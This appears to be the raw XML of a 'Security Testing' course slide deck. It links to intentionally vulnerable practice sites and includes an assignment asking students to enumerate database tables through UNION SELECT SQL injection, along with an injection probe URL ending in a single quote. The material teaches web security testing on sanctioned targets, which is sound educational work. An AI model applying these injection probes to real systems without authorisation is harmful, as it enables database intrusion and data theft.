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6" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="270" r:id="rId6"/>
    <p:sldId id="271" r:id="rId7"/>
    <p:sldId id="272" r:id="rId8"/>
    <p:sldId id="276" r:id="rId9"/>
    <p:sldId id="273" r:id="rId10"/>
    <p:sldId id="274" r:id="rId11"/>
    <p:sldId id="275" r:id="rId12"/>
    <p:sldId id="277" r:id="rId13"/>
    <p:sldId id="278" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="261" r:id="rId16"/>
    <p:sldId id="319" r:id="rId17"/>
    <p:sldId id="330" r:id="rId18"/>
    <p:sldId id="331" r:id="rId19"/>
    <p:sldId id="320" r:id="rId20"/>
    <p:sldId id="332" r:id="rId21"/>
    <p:sldId id="333" r:id="rId22"/>
    <p:sldId id="334" r:id="rId23"/>
    <p:sldId id="335" r:id="rId24"/>
    <p:sldId id="336" r:id="rId25"/>
    <p:sldId id="321" r:id="rId26"/>
    <p:sldId id="344" r:id="rId27"/>
    <p:sldId id="322" r:id="rId28"/>
    <p:sldId id="346" r:id="rId29"/>
    <p:sldId id="347" r:id="rId30"/>
    <p:sldId id="345" r:id="rId31"/>
    <p:sldId id="323" r:id="rId32"/>
    <p:sldId id="324" r:id="rId33"/>
    <p:sldId id="343" r:id="rId34"/>
    <p:sldId id="325" r:id="rId35"/>
    <p:sldId id="337" r:id="rId36"/>
    <p:sldId id="338" r:id="rId37"/>
    <p:sldId id="339" r:id="rId38"/>
    <p:sldId id="340" r:id="rId39"/>
    <p:sldId id="341" r:id="rId40"/>
    <p:sldId id="348" r:id="rId41"/>
    <p:sldId id="326" r:id="rId42"/>
    <p:sldId id="349" r:id="rId43"/>
    <p:sldId id="327" r:id="rId44"/>
    <p:sldId id="328" r:id="rId45"/>
    <p:sldId id="329" r:id="rId46"/>
    <p:sldId id="342" r:id="rId47"/>
    <p:sldId id="350" r:id="rId48"/>
    <p:sldId id="318" r:id="rId49"/>
    <p:sldId id="262" r:id="rId50"/>
    <p:sldId id="264" r:id="rId51"/>
    <p:sldId id="263" r:id="rId52"/>
    <p:sldId id="351" r:id="rId53"/>
    <p:sldId id="353" r:id="rId54"/>
    <p:sldId id="355" r:id="rId55"/>
    <p:sldId id="352" r:id="rId56"/>
    <p:sldId id="265" r:id="rId57"/>
    <p:sldId id="266" r:id="rId58"/>
    <p:sldId id="354" r:id="rId59"/>
    <p:sldId id="267" r:id="rId60"/>
    <p:sldId id="357" r:id="rId61"/>
    <p:sldId id="358" r:id="rId62"/>
    <p:sldId id="371" r:id="rId63"/>
    <p:sldId id="359" r:id="rId64"/>
    <p:sldId id="360" r:id="rId65"/>
    <p:sldId id="361" r:id="rId66"/>
    <p:sldId id="365" r:id="rId67"/>
    <p:sldId id="372" r:id="rId68"/>
    <p:sldId id="373" r:id="rId69"/>
    <p:sldId id="374" r:id="rId70"/>
    <p:sldId id="376" r:id="rId71"/>
    <p:sldId id="375" r:id="rId72"/>
    <p:sldId id="377" r:id="rId73"/>
    <p:sldId id="366" r:id="rId74"/>
    <p:sldId id="367" r:id="rId75"/>
    <p:sldId id="368" r:id="rId76"/>
    <p:sldId id="369" r:id="rId77"/>
    <p:sldId id="370" r:id="rId78"/>
    <p:sldId id="363" r:id="rId79"/>
    <p:sldId id="364" r:id="rId80"/>
    <p:sldId id="362" r:id="rId81"/>
    <p:sldId id="356" r:id="rId82"/>
    <p:sldId id="298" r:id="rId83"/>
    <p:sldId id="299" r:id="rId84"/>
    <p:sldId id="387" r:id="rId85"/>
    <p:sldId id="300" r:id="rId86"/>
    <p:sldId id="301" r:id="rId87"/>
    <p:sldId id="302" r:id="rId88"/>
    <p:sldId id="303" r:id="rId89"/>
    <p:sldId id="304" r:id="rId90"/>
    <p:sldId id="269" r:id="rId91"/>
    <p:sldId id="379" r:id="rId92"/>
    <p:sldId id="282" r:id="rId93"/>
    <p:sldId id="280" r:id="rId94"/>
    <p:sldId id="281" r:id="rId95"/>
    <p:sldId id="283" r:id="rId96"/>
    <p:sldId id="284" r:id="rId97"/>
    <p:sldId id="285" r:id="rId98"/>
    <p:sldId id="287" r:id="rId99"/>
    <p:sldId id="286" r:id="rId100"/>
    <p:sldId id="288" r:id="rId101"/>
    <p:sldId id="289" r:id="rId102"/>
    <p:sldId id="290" r:id="rId103"/>
    <p:sldId id="291" r:id="rId104"/>
    <p:sldId id="292" r:id="rId105"/>
    <p:sldId id="293" r:id="rId106"/>
    <p:sldId id="294" r:id="rId107"/>
    <p:sldId id="295" r:id="rId108"/>
    <p:sldId id="296" r:id="rId109"/>
    <p:sldId id="305" r:id="rId110"/>
    <p:sldId id="381" r:id="rId111"/>
    <p:sldId id="306" r:id="rId112"/>
    <p:sldId id="307" r:id="rId113"/>
    <p:sldId id="309" r:id="rId114"/>
    <p:sldId id="310" r:id="rId115"/>
    <p:sldId id="312" r:id="rId116"/>
    <p:sldId id="313" r:id="rId117"/>
    <p:sldId id="314" r:id="rId118"/>
    <p:sldId id="380" r:id="rId119"/>
    <p:sldId id="315" r:id="rId120"/>
    <p:sldId id="316" r:id="rId121"/>
    <p:sldId id="383" r:id="rId122"/>
    <p:sldId id="384" r:id="rId123"/>
    <p:sldId id="317" r:id="rId124"/>
    <p:sldId id="386" r:id="rId125"/>
    <p:sldId id="385" r:id="rId126"/>
    <p:sldId id="378" r:id="rId1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BA8B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70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="536"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presProps" Target="pres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slide" Target="slides/slide117.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xmlns=""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xmlns=""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xmlns="" id="{9925CCF1-92C0-4AF3-BFAF-4921631915AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9184DA70-C731-4C70-880D-CCD4705E623C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/23/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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583314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xmlns="" id="{7D5506EE-1026-4F35-9ACC-BD05BE0F9B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B612A279-0833-481D-8C56-F67FD0AC6C50}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/23/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B7696E5F-8D95-4450-AE52-5438E6EDE2B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xmlns="" id="{999B2253-74CC-409E-BEB0-F8EFCFCB562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722698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xmlns=""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xmlns="" id="{AF33D6B0-F070-45C4-A472-19F432BE3932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6587DA83-5663-4C9C-B9AA-0B40A3DAFF81}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/23/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9975399F-DAB2-410D-967F-ED17E6F796E7}"/>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xmlns="" id="{F762A46F-6BE5-4D12-9412-5CA7672EA8EC}"/>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618272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xmlns="" id="{354D8B55-9EA8-4B81-8E84-9B93B0A27559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4BE1D723-8F53-4F53-90B0-1982A396982E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/23/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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926706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xmlns=""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xmlns=""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xmlns="" id="{AAF2E137-EC28-48F8-9198-1F02539029B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{97669AF7-7BEB-44E4-9852-375E34362B5B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/23/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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041625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xmlns="" id="{5782D47D-B0DC-4C40-BCC6-BBBA32584A38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BAAAC38D-0552-4C82-B593-E6124DFADBE2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/23/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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566630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xmlns="" id="{8AF8A515-AA94-45D1-9223-5C2272618D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D9DF0F1C-5577-4ACB-BB62-DF8F3C494C7E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/23/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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0681946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xmlns="" id="{7392073F-158F-44A3-8913-917AFFC1BC20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1775B394-D9F9-4F0C-B15D-605F45CB9E9F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/23/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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118605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xmlns=""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xmlns="" id="{94E9223F-721F-47BF-9FD5-0F8D12FF0DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{39667345-2558-425A-8533-9BFDBCE15005}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/23/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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014226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xmlns=""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2/23/2022</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9332822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xmlns=""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2/23/2022</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232677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xmlns=""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2/23/2022</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xmlns=""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4982234"/>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47" r:id="rId3"/>
    <p:sldLayoutId id="2147483743" r:id="rId4"/>
    <p:sldLayoutId id="2147483738" r:id="rId5"/>
    <p:sldLayoutId id="2147483732" r:id="rId6"/>
    <p:sldLayoutId id="2147483733" r:id="rId7"/>
    <p:sldLayoutId id="2147483734" r:id="rId8"/>
    <p:sldLayoutId id="2147483735" r:id="rId9"/>
    <p:sldLayoutId id="2147483736" r:id="rId10"/>
    <p:sldLayoutId id="2147483737" r:id="rId11"/>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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1'" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1'" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1'" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1'" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1'" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1'" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1'" TargetMode="External"/><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hyperlink" Target="http://observatory.allizom.org/" TargetMode="Externa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hyperlink" Target="https://securityheaders.com/" TargetMode="Externa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hyperlink" Target="https://demo.testfire.net/login.jsp" TargetMode="Externa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hyperlink" Target="https://demo.testfire.net/login.jsp" TargetMode="Externa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hyperlink" Target="https://demo.testfire.net/login.jsp" TargetMode="Externa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hyperlink" Target="https://demo.testfire.net/login.jsp" TargetMode="Externa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hyperlink" Target="https://demo.testfire.net/login.jsp" TargetMode="Externa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hyperlink" Target="https://demo.testfire.net/login.jsp" TargetMode="Externa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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/login.php" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/login.php" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/login.php" TargetMode="Externa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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/login.php" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/login.php" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://demo.testfire.net/" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://demo.testfire.net/" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://demo.testfire.net/" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://demo.testfire.net/" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://brutelogic.com.br/xss.php" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1'" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1'" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1'" TargetMode="Externa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xmlns="" id="{A9286AD2-18A9-4868-A4E3-7A2097A2081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1"/>
            <a:ext cx="12192001"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78FD68DA-43BA-4508-8DE2-BA9BB7B2FA5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289754" y="639097"/>
            <a:ext cx="6253317" cy="3686015"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>TESTING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A picture containing building, sitting, bench, side&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{282CF6DD-7FE8-4063-9551-1B7BBCE92ABE}"/>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1" y="1"/>
            <a:ext cx="4635315" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E7A7CD63-7EC3-44F3-95D0-595C4019FF24}"/>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5427754" y="4498925"/>
            <a:ext cx="563610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37378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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{613385B7-D707-4DA0-9A30-4B449C54E2AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704975" y="219011"/>
            <a:ext cx="8058150" cy="5276850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59759358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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can you find out other 3 tables by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union+select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try union statement &amp; select statement]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
